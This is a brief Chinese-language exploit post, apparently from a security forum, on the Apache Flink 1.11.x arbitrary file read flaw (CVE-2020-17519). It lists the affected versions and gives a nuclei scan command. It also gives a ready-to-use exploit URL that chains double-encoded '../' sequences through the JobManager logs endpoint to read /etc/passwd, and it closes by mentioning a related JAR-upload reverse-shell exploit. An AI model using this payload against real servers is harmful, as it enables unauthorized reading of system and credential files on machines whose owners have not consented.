综合 Apache Flink 1.11.0

[Shacker已验证会员]

## 漏洞概述
Apache Flink 1.11.0中引入的一个更改，允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

## 影响范围
```http
Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2
```

## POC
```bash
nuclei.exe -tags apache -t cves/ -stats -u http://test.com:8081
```

## EXP

```http
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```

## 参考链接

[CVE-2020-17519 & CVE-2020-17518 分析](https://xz.aliyun.com/t/8993?page=1)

 

POC  AR包上传，导致任意命令执行，反弹shell

POC  CVE-2020-17518